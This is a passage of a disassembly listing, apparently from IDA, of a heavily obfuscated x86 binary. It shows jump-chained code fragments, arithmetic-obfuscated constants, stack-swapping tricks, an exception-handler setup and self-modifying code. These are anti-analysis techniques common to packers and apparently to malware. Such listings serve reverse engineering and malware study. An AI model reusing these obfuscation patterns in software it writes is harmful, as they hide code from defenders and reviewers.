add eax, 0DDFDC69Ch
jmp loc_449D87
sub_451900 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_451911: ; CODE XREF: sub_439FD5+12EE9j
js loc_43A680
loc_451917: ; CODE XREF: sub_439FD5:loc_450861j
mov eax, [esp+4+var_4]
push offset sub_449FB0
jmp loc_439E61
; END OF FUNCTION CHUNK FOR sub_439FD5
; ---------------------------------------------------------------------------
loc_451924: ; CODE XREF: ut7h7i2x:004480D6j
jnp loc_44E5F7
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_45192A: ; CODE XREF: sub_4471CA:loc_44BA82j
rol edi, 2
jb loc_441D5B
loc_451933: ; CODE XREF: ut7h7i2x:00457D05j
jmp loc_45082B
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
loc_451938: ; CODE XREF: ut7h7i2x:00455F93j
jmp loc_447C3F
; ---------------------------------------------------------------------------
or edx, esi
jmp loc_441D49
; ---------------------------------------------------------------------------
jz loc_44B9E2
jmp sub_458007
; =============== S U B R O U T I N E =======================================
sub_45194F proc near ; CODE XREF: sub_44E688-6713j
var_4 = dword ptr -4
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
loc_451955: ; CODE XREF: ut7h7i2x:0044ED18j
call sub_4447B8
loc_45195A: ; CODE XREF: ut7h7i2x:0043FDD2j
mov esi, [ecx]
sub_45194F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_45195C proc near ; CODE XREF: sub_458054:loc_447286p
xchg esi, [esp+0]
pop esi
push edx
pushf
call sub_4494C0
sub_45195C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_444A08
loc_451967: ; CODE XREF: sub_444A08-9C86j
call sub_43D3E7
loc_45196C: ; CODE XREF: sub_444BAE+12Dj
jmp loc_450E27
; END OF FUNCTION CHUNK FOR sub_444A08
; =============== S U B R O U T I N E =======================================
sub_451971 proc near ; DATA XREF: ut7h7i2x:00442147o
; FUNCTION CHUNK AT 00443C65 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447C07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449F7D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044EF18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451364 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459BA8 SIZE 00000006 BYTES
pushf
loc_451972: ; CODE XREF: ut7h7i2x:loc_4433D9j
push 4460567Fh
pop edi
rol edi, 2
jmp loc_447C07
sub_451971 endp
; =============== S U B R O U T I N E =======================================
sub_451980 proc near ; CODE XREF: ut7h7i2x:loc_452C96p
; ut7h7i2x:00456C2Bj
xchg ebx, [esp+0]
pop ebx
popf
xor eax, edi
pop edi
push offset sub_44EA97
jmp nullsub_544
sub_451980 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push edi
push 45D475C8h
pop edi
add edi, 0A3CA311Dh
jmp loc_43B70F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_4519A4: ; CODE XREF: sub_444273+ED0Ej
jnz loc_447F9B
jmp loc_451CFC
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_4519AF: ; CODE XREF: sub_43E6CC-36A1j
and edi, 0E4F6E911h
cmp edi, 129D29D8h
jmp loc_4590E4
; END OF FUNCTION CHUNK FOR sub_43E6CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_367. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sub ebp, edx
mov ecx, [eax]
jmp sub_447B48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_4519CA: ; CODE XREF: sub_4519D2:loc_4528D5j
pop ecx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FF0A
loc_4519CD: ; CODE XREF: sub_44FF0A+688Ej
jmp loc_44A648
; END OF FUNCTION CHUNK FOR sub_44FF0A
; =============== S U B R O U T I N E =======================================
sub_4519D2 proc near ; CODE XREF: sub_446785+2p
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043D0F6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D9FE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044509D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004468D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448223 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448BFE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044FDAE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004519CA SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004528D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004552C8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459401 SIZE 0000001E BYTES
push large dword ptr fs:0
mov large fs:0, esp
call sub_442F0F
call sub_44B87B
mov edx, [ebx+3Ch]
jmp loc_4552C8
sub_4519D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_4519F2: ; CODE XREF: sub_44445F:loc_43D5B9j
rol edx, 5
add edx, eax
rol edx, 5
xor edx, esi
jmp loc_4568C7
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
mov eax, 475BA966h
call sub_43AED9
mov ds:off_41D01C, eax
lea eax, loc_43C246
mov byte ptr [eax], 0C3h
jmp loc_43C246
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_620. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_451A20: ; CODE XREF: ut7h7i2x:00451679j
jmp loc_4534FE
; ---------------------------------------------------------------------------
loc_451A25: ; CODE XREF: ut7h7i2x:0044174Cj
jmp sub_43AA94
; ---------------------------------------------------------------------------
ror ebx, 17h
jmp loc_45974C
; ---------------------------------------------------------------------------
locret_451A32: ; CODE XREF: ut7h7i2x:loc_4582C3j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_451A33: ; CODE XREF: sub_444273:loc_459677j
jz loc_456046
sub al, 99h
push 9C9797E0h
pop edx
and edx, 0CD8A18DCh
sub edx, 0D28D8B37h
jmp loc_44619F
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_451A52: ; CODE XREF: sub_4471CA:loc_43A164j
xchg edi, [esp+4+var_4]
jmp sub_452B4F
; END OF FUNCTION CHUNK FOR sub_4471CA
; =============== S U B R O U T I N E =======================================
sub_451A5A proc near ; CODE XREF: sub_4431FF+7ED6p
; ut7h7i2x:0044C459j
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A7B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B0EC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442E4A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004501FE SIZE 00000005 BYTES
xchg eax, [esp+4+var_4]
pop eax
xchg eax, [esp+0]
mov ecx, eax
pop eax
jo loc_442E4A
jmp loc_43BFB3
sub_451A5A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DA21
loc_451A6F: ; CODE XREF: sub_43DA21:loc_43B824j
push ecx
mov [ebp+var_4], eax
push offset loc_44EADC
jmp nullsub_525
; END OF FUNCTION CHUNK FOR sub_43DA21
; =============== S U B R O U T I N E =======================================
sub_451A7D proc near ; DATA XREF: ut7h7i2x:00450593o
; FUNCTION CHUNK AT 0044367A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BE1E SIZE 00000008 BYTES
push edi
loc_451A7E: ; CODE XREF: ut7h7i2x:loc_43F177j
push 0C5246B72h
pop edi
rol edi, 10h
xor edi, 0DED1E283h
rol edi, 1
add edi, 94FF0954h
jmp loc_44BE1E
sub_451A7D endp
; ---------------------------------------------------------------------------
loc_451A9A: ; CODE XREF: ut7h7i2x:loc_44EFB5j
rol edx, 5
cmp edx, 0E5AE2CB6h
jmp loc_44104C
; ---------------------------------------------------------------------------
locret_451AA8: ; CODE XREF: ut7h7i2x:loc_43B410j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_506. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_451AAA: ; CODE XREF: sub_450FDE:loc_43F688j
; sub_43F1B2:loc_444926j ...
jmp loc_439AD6
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_451AAF: ; CODE XREF: sub_450FDE-14F79j
; sub_4503C3-761Aj
push offset aZL_zLq_SB ; "‡<$‹Ï_‡<$‹ï_Ãé\nB"
jmp nullsub_284
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
mov eax, 5389CFC1h
push edx
push 0DA191972h
pop edx
sub edx, 0D210ADB0h
jnz loc_44FCA4
; START OF FUNCTION CHUNK FOR sub_444A12
loc_451AD1: ; CODE XREF: sub_444A12+14j
jmp loc_44D006
; END OF FUNCTION CHUNK FOR sub_444A12
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_451AD6: ; CODE XREF: sub_44C99C-B018j
and edi, eax
loc_451AD8: ; CODE XREF: sub_43FF65:loc_43DE13j
and ecx, 6480AE23h
loc_451ADE: ; CODE XREF: sub_44C99C:loc_452CD5j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43AB9D
jmp loc_458C1B
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F9A1
loc_451AEF: ; CODE XREF: sub_44F9A1:loc_43DEE5j
jnp loc_44539E
mov [edx], eax
jmp loc_44C5A7
; END OF FUNCTION CHUNK FOR sub_44F9A1
; ---------------------------------------------------------------------------
loc_451AFC: ; CODE XREF: ut7h7i2x:0044942Ej
cdq
cmp edx, 43BB4CB9h
jmp loc_455E54
; ---------------------------------------------------------------------------
loc_451B08: ; CODE XREF: ut7h7i2x:00449A07j
rol edx, 0Eh
add edx, 173F2F13h
xor edx, 5BA37AB7h
add edx, 5ED96C75h
xchg edx, [esp]
jmp loc_43C316
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448215
loc_451B25: ; CODE XREF: sub_448215:loc_4416BEj
xchg eax, [esp+0]
push eax
push 0B3C5EFh
pop eax
xor eax, 0B2F33965h
or eax, 9B527EB8h
rol eax, 1Fh
jmp loc_44DE54
; END OF FUNCTION CHUNK FOR sub_448215
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EB8A
loc_451B43: ; CODE XREF: sub_43EB8A+188ECj
sbb eax, 2B521A19h
jmp loc_4465F2
; END OF FUNCTION CHUNK FOR sub_43EB8A
; ---------------------------------------------------------------------------
loc_451B4E: ; CODE XREF: ut7h7i2x:0043A738j
jnz loc_446A52
; START OF FUNCTION CHUNK FOR sub_44917B
loc_451B54: ; CODE XREF: sub_44917B+B810j
jmp loc_43E4E5
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_451B59: ; CODE XREF: sub_43DD17+16j
push offset sub_441283
jmp loc_441951
; END OF FUNCTION CHUNK FOR sub_43DD17
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_451B63 proc near ; CODE XREF: sub_4455F4:loc_451573j
retn
sub_451B63 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_451B64: ; CODE XREF: sub_447EB5+119FAj
jmp loc_452FA0
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_451B69: ; CODE XREF: sub_445AD1-BC4Cj
jmp loc_44C5EC
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
loc_451B6E: ; CODE XREF: ut7h7i2x:00451ECEj
mov esp, ebp
call sub_4554A2
; =============== S U B R O U T I N E =======================================
sub_451B75 proc near ; CODE XREF: sub_447EB5-907Dp
; sub_4406F1:loc_440149j
; FUNCTION CHUNK AT 0044CC80 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
xor eax, 8945100Eh
push offset loc_44DD6B
jmp loc_44CC80
sub_451B75 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_451B89: ; CODE XREF: sub_44092D:loc_455D95j
jge loc_4486D6
; END OF FUNCTION CHUNK FOR sub_44092D
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_451B8F: ; CODE XREF: sub_4503C3-D925j
jmp loc_4556D4
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
and esi, 50732B85h
and edi, 0EA5A011Fh
jmp loc_4486D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_451BA5: ; CODE XREF: sub_444273+DA8Fj
and esi, edi
ror eax, 2
push 156E1051h
and eax, 75DDEB0h
jmp loc_447F9B
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
dw 0FA3Bh
dd 0FE96A2E9h
db 0FFh
; ---------------------------------------------------------------------------
loc_451BC1: ; CODE XREF: ut7h7i2x:00448550j
jns loc_457821
push ebp
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_451BC8: ; CODE XREF: sub_442B3B+3105j
xor eax, 6EEC0BC8h
push offset loc_458ACB
jmp loc_458BAB
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_451BD8: ; CODE XREF: sub_452C66-4761j
jl loc_458EA4
loc_451BDE: ; CODE XREF: sub_44B5CF+677Cj
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
push ecx
rol edi, 16h
jmp loc_458E9D
; =============== S U B R O U T I N E =======================================
sub_451BEC proc near ; CODE XREF: ut7h7i2x:0043A7E6j
; sub_43CFB6+19B43p
xchg eax, [esp+0]
pop eax
mov ds:dword_446648, eax
retn
sub_451BEC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4443DE
loc_451BF7: ; CODE XREF: sub_4443DE+1Cj
jmp loc_457CA9
; END OF FUNCTION CHUNK FOR sub_4443DE
; ---------------------------------------------------------------------------
loc_451BFC: ; CODE XREF: ut7h7i2x:0043AA7Cj
jmp loc_44B2E0
; ---------------------------------------------------------------------------
loc_451C01: ; CODE XREF: ut7h7i2x:loc_44BD9Bj
push ebp
jmp loc_443855
; ---------------------------------------------------------------------------
loc_451C07: ; CODE XREF: ut7h7i2x:00448561j
or eax, edx
mov edx, [ebp+8]
mov [edx-8], eax
; START OF FUNCTION CHUNK FOR sub_4423C1
loc_451C0F: ; CODE XREF: ut7h7i2x:loc_453946j
; ut7h7i2x:loc_4560D0j ...
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_44D47F
; END OF FUNCTION CHUNK FOR sub_4423C1
; ---------------------------------------------------------------------------
loc_451C1A: ; CODE XREF: ut7h7i2x:00442638j
pop edi
rol edi, 1Bh
jb loc_43C26D
push ecx
mov edx, edi
shr ecx, 0Eh
jmp loc_445533
; ---------------------------------------------------------------------------
loc_451C2F: ; CODE XREF: ut7h7i2x:0044205Bj
xor ebp, edi
loc_451C31: ; CODE XREF: ut7h7i2x:0045A0FAj
add ebx, 0EB52E36h
js loc_43AC19
loc_451C3D: ; CODE XREF: ut7h7i2x:00446C46j
jmp loc_4526FE
; ---------------------------------------------------------------------------
jbe loc_453998
sub edi, edx
shl ecx, 16h
jmp loc_43AC19
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FD68
loc_451C52: ; CODE XREF: sub_43FD68+28j
jl loc_446B1A
mov ebp, eax
push 4DD73A7Dh
jmp loc_446B1A
; END OF FUNCTION CHUNK FOR sub_43FD68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_451C64: ; CODE XREF: sub_4459EE:loc_444B49j
push eax
cmp esi, edx
jmp loc_44069D
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FD54
loc_451C6C: ; CODE XREF: sub_44FD54+Aj
mov eax, [ebp-20h]
call sub_441C6B
loc_451C74: ; DATA XREF: sub_455807:loc_43E539o
add ebx, 70352081h
xchg ebx, [esp-4+arg_0]
jmp nullsub_135
; END OF FUNCTION CHUNK FOR sub_44FD54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445B34
loc_451C82: ; CODE XREF: sub_445B34+7j
push 0EE70F951h
push offset loc_44669C
jmp loc_440073
; END OF FUNCTION CHUNK FOR sub_445B34
; ---------------------------------------------------------------------------
test ebp, ecx
jmp loc_447710
; =============== S U B R O U T I N E =======================================
sub_451C98 proc near ; CODE XREF: sub_44C20D-E449p
; ut7h7i2x:00445354j
xchg edi, [esp+0]
pop edi
push ebx
call sub_443AB3
sub_451C98 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44E9E4
loc_451CA2: ; CODE XREF: sub_44E9E4+3710j
jmp sub_43F7A5
; END OF FUNCTION CHUNK FOR sub_44E9E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E70F
loc_451CA7: ; CODE XREF: sub_44E70F+9j
jmp loc_440DD6
; END OF FUNCTION CHUNK FOR sub_44E70F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_451CAC: ; CODE XREF: sub_450231-BB00j
ja loc_452EF6
loc_451CB2: ; CODE XREF: sub_450231:loc_451FC5j
jmp loc_456509
; ---------------------------------------------------------------------------
loc_451CB7: ; CODE XREF: sub_43AB62:loc_43CF35j
; sub_442A4D:loc_444ED0j ...
call dword ptr [ebp-4]
push offset loc_442D7C
jmp loc_44C057
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
loc_451CC4: ; CODE XREF: ut7h7i2x:loc_439BC5j
or ebp, ebx
test ecx, ebp
jmp loc_43A8F4
; ---------------------------------------------------------------------------
loc_451CCD: ; CODE XREF: ut7h7i2x:0045AE3Dj
js loc_458E8C
sbb ebx, eax
jmp loc_4581C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_451CDA: ; CODE XREF: sub_44A0CE:loc_43C241j
mov edx, [esp+0]
push eax
mov eax, edx
push ebx
push 6A2597EFh
loc_451CE6: ; CODE XREF: sub_453E14:loc_43CEB1j
jmp loc_444FA7
; END OF FUNCTION CHUNK FOR sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_451CEB: ; CODE XREF: sub_44BF76+D3FBj
mov eax, [eax]
cmp dword ptr [eax+3Ch], 0
jz loc_456678
jmp loc_439AAF
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_451CFC: ; CODE XREF: sub_444273+D737j
add esi, 0DA009C1Ah
jmp loc_451BA5
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
loc_451D07: ; CODE XREF: ut7h7i2x:004570B2j
jnp loc_458F90
xchg esi, [esp]
pop esi
jno loc_44F190
pop edx
call sub_44B58F
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_451D1D: ; CODE XREF: sub_44E6B4-6594j
adc edi, ebx
shl esi, 8
jmp loc_442204
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
loc_451D27: ; DATA XREF: sub_455E89+1o
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp-4], eax
mov eax, [ebp-4]
push offset loc_443F35
jmp loc_44A189
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_451D3C: ; CODE XREF: sub_44B5CF:loc_44B859j
xor edx, 1E2E2B76h
add edx, 0FA4EC6F6h
xchg edx, [esp+0]
jmp loc_451BDE
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_451D50: ; CODE XREF: sub_44E5DC-79E3j
mov edi, eax
loc_451D52: ; CODE XREF: sub_44C20D+B54j
xchg edi, [esp+0]
loc_451D55: ; CODE XREF: sub_440B8A+188C5j
mov eax, esp
call sub_4552AC
loc_451D5C: ; CODE XREF: sub_45967C-13898j
jmp loc_447945
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451900
loc_451D61: ; CODE XREF: sub_451900-7B6Cj
jg loc_45A5D8
jmp loc_4478C6
; END OF FUNCTION CHUNK FOR sub_451900
; ---------------------------------------------------------------------------
loc_451D6C: ; CODE XREF: ut7h7i2x:loc_446814j
pop esi
add esi, 23A88A35h
or esi, 0B7234339h
xor esi, 0A3FEF84Dh
add esi, 0ABE5D7ACh
xchg esi, [esp]
jmp sub_44E2C4
; ---------------------------------------------------------------------------
locret_451D8D: ; CODE XREF: ut7h7i2x:004452A6j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431BB
loc_451D8E: ; CODE XREF: sub_4431BB+Dj
jmp loc_43E98B
; END OF FUNCTION CHUNK FOR sub_4431BB
; ---------------------------------------------------------------------------
sub edx, 5A9AD8D3h
shl eax, 0Fh
jmp sub_443CC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_451DA1: ; CODE XREF: sub_4459EE:loc_43F931j
push 3A210F4Fh
xchg edx, [esp+4+var_4]
mov eax, edx
pop edx
rol eax, 0Dh
or eax, 38B5D242h
jmp loc_443223
; END OF FUNCTION CHUNK FOR sub_4459EE
; =============== S U B R O U T I N E =======================================
sub_451DBA proc near ; CODE XREF: sub_454196:loc_4468EAj
add esp, 0FFFFFFF8h
mov [ebp-4], eax
call nullsub_19
sub_451DBA endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4456B6
loc_451DC5: ; CODE XREF: sub_4456B6:loc_45078Aj
mov eax, [ebp-4]
jmp loc_44F4A7
; END OF FUNCTION CHUNK FOR sub_4456B6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_244. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_451DCE: ; CODE XREF: sub_44445F-5A15j
jmp loc_439512
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
loc_451DD3: ; CODE XREF: ut7h7i2x:loc_458A67j
not eax
jmp loc_441A28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_451DDA: ; CODE XREF: sub_439BF8:loc_43DA76j
; sub_439BF8+176E9j
lea eax, [ebp-26Fh]
cmp dword ptr [eax], 47424454h
jz loc_456EB1
jmp loc_442EF0
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452303
loc_451DF1: ; CODE XREF: sub_452303+1Aj
and eax, 0B1BA1C3Fh
sub eax, 1B2D484Ch
call near ptr dword_44145C+16h
loc_451E02: ; CODE XREF: ut7h7i2x:0044F84Dj
jmp loc_4521C4
; END OF FUNCTION CHUNK FOR sub_452303
; ---------------------------------------------------------------------------
xor ebp, 39EFD2D9h
jmp loc_456C91
; ---------------------------------------------------------------------------
cmp ebp, 1DD35CC1h
jmp loc_455058
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_451E1D: ; CODE XREF: sub_447EB5-8E77j
jz loc_450FEE
pop edx
loc_451E24: ; CODE XREF: sub_447EB5:loc_448132j
push 5C48A030h
pop eax
jmp loc_4496CF
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
locret_451E2F: ; CODE XREF: ut7h7i2x:loc_452F53j
retn
; ---------------------------------------------------------------------------
loc_451E30: ; CODE XREF: ut7h7i2x:0043CE8Ej
jmp loc_44511A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4481A2
loc_451E35: ; CODE XREF: sub_4481A2:loc_44774Bj
or eax, eax
jz loc_447384
cmp eax, 0FFFFFFFFh
jz loc_447384
mov eax, [eax]
jmp loc_449226
; END OF FUNCTION CHUNK FOR sub_4481A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_451E4D: ; CODE XREF: sub_458CBB:loc_44A96Cj
jo loc_44549C
sub al, 99h
push offset sub_456B19
jmp sub_454AD3
; END OF FUNCTION CHUNK FOR sub_458CBB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452857
loc_451E60: ; CODE XREF: sub_452857+3824j
jmp nullsub_243
; END OF FUNCTION CHUNK FOR sub_452857
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_451E65: ; CODE XREF: sub_4503C3:loc_4393F5j
; sub_4503C3-15682j ...
jmp loc_44C549
; ---------------------------------------------------------------------------
loc_451E6A: ; CODE XREF: sub_4503C3-14046j
; ut7h7i2x:004534D7j
pop ecx
call sub_45340C
loc_451E70: ; CODE XREF: sub_45983B:loc_44DE12j
jmp loc_44A125
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
add esi, 22B21C42h
jge loc_44740E
jmp sub_4540AE
; =============== S U B R O U T I N E =======================================
sub_451E86 proc near ; CODE XREF: sub_439FD5:loc_43A680j
; sub_446CA0-44CCp
; FUNCTION CHUNK AT 0043F6F7 SIZE 00000011 BYTES
xchg edi, [esp+0]
pop edi
add eax, [ebp-4]
push ecx
push 48982C0Bh
pop ecx
jmp loc_43F6F7
sub_451E86 endp
; ---------------------------------------------------------------------------
cmp ecx, 0A0639E69h
jmp loc_43B22E
; ---------------------------------------------------------------------------
jo loc_44C945
sbb eax, 0C3544FB9h
jmp sub_459C45
; ---------------------------------------------------------------------------
loc_451EB5: ; CODE XREF: ut7h7i2x:loc_448405j
jl loc_4536B6
; START OF FUNCTION CHUNK FOR sub_44C87F
loc_451EBB: ; CODE XREF: sub_44C87F+1Dj
jmp loc_43E5B9
; END OF FUNCTION CHUNK FOR sub_44C87F
; ---------------------------------------------------------------------------
sub esi, edi
jmp loc_4536B1
; ---------------------------------------------------------------------------
loc_451EC7: ; DATA XREF: sub_452B14:loc_4566DBo
call sub_44E2C4
test al, al
jz loc_451B6E
jmp loc_441F29
; ---------------------------------------------------------------------------
popf
jmp sub_44C87F
; =============== S U B R O U T I N E =======================================
sub_451EDF proc near ; CODE XREF: sub_44A4C0:loc_44AC36p
; sub_443C4A+C0F2j
; FUNCTION CHUNK AT 00439CCB SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
pop eax
cmp dword ptr [eax], 0
jnz loc_44C6E0
jmp loc_439CCB
sub_451EDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_451EF2 proc near ; CODE XREF: sub_44DD56-1479Ej
; sub_44A4C0:loc_445D36p ...
; FUNCTION CHUNK AT 0044B243 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AE26 SIZE 00000005 BYTES
jo sub_43B0A8
push ebp
mov ebp, esp
jmp loc_45AE26
sub_451EF2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ecx, edi
jmp sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_451F07: ; CODE XREF: sub_4463D6+2B54j
xor eax, 832B57FCh
add eax, 5E550ED5h
push edi
call sub_454C8C
loc_451F19: ; CODE XREF: sub_43C1D2+1C9CEj
jmp loc_44FE80
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC28
loc_451F1E: ; CODE XREF: sub_44EC28-223Dj
jmp loc_440268
; END OF FUNCTION CHUNK FOR sub_44EC28
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B5E
loc_451F24: ; CODE XREF: sub_456B5E+Aj
jmp loc_442225
; END OF FUNCTION CHUNK FOR sub_456B5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BCCB
loc_451F29: ; CODE XREF: sub_44BCCB+A61Aj
jmp loc_44190E
; END OF FUNCTION CHUNK FOR sub_44BCCB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583C4
loc_451F2E: ; CODE XREF: sub_4583C4-1CC29j
jmp loc_45652B
; END OF FUNCTION CHUNK FOR sub_4583C4
; ---------------------------------------------------------------------------
loc_451F33: ; CODE XREF: ut7h7i2x:00459D57j
sbb esi, 24FF472Ch
; =============== S U B R O U T I N E =======================================
sub_451F39 proc near ; CODE XREF: sub_44EC11-11850p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B583 SIZE 0000000B BYTES
